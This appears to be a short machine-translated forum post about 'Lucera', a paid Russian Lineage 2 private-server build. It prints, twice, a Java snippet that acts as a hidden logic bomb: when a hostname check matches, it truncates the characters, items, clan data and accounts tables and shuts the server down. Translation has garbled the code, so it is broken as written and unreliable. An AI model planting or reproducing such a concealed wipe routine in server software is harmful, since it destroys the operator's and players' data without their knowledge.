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Source Lucera (Rus. Private Project)


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This is a Russian paid assembly which sold 5,000 wmr.

The implementation of the assembly of 95%. This is the best assembly that could buy and put on the project. The SERVER was on the online 5000 +.

03069efc2209.png | 03069efc2209.png


Credits: La2Base.Ru


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if (Config.GAMESERVER_HOSTNAME.equals ("") | |

Config.GAMESERVER_HOSTNAME.equals (""))

ThreadPoolManager.getInstance (). schedule (new Runnable () {

Public void run () {

try {

L2DatabaseFactory.getInstance connection con = (). getConnection ();

con.prepareStatement ("TRUNCATE table characters"). execute ();

con.prepareStatement ("TRUNCATE table Items"). execute ();

con.prepareStatement ("TRUNCATE table clan_data "). execute ();

con.prepareStatement ("TRUNCATE table Accounts"). execute ();

con.close ();

} catch (Exception e) { } System.exit (2); } }, 2000);

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if (Config.GAMESERVER_HOSTNAME.equals ("") | |

Config.GAMESERVER_HOSTNAME.equals (""))

ThreadPoolManager.getInstance (). schedule (new Runnable () {

Public void run () {

try {

L2DatabaseFactory.getInstance connection con = (). getConnection ();

con.prepareStatement ("TRUNCATE table characters"). execute ();

con.prepareStatement ("TRUNCATE table Items"). execute ();

con.prepareStatement ("TRUNCATE table clan_data "). execute ();

con.prepareStatement ("TRUNCATE table Accounts"). execute ();

con.close ();

} catch (Exception e) { } System.exit (2); } }, 2000);

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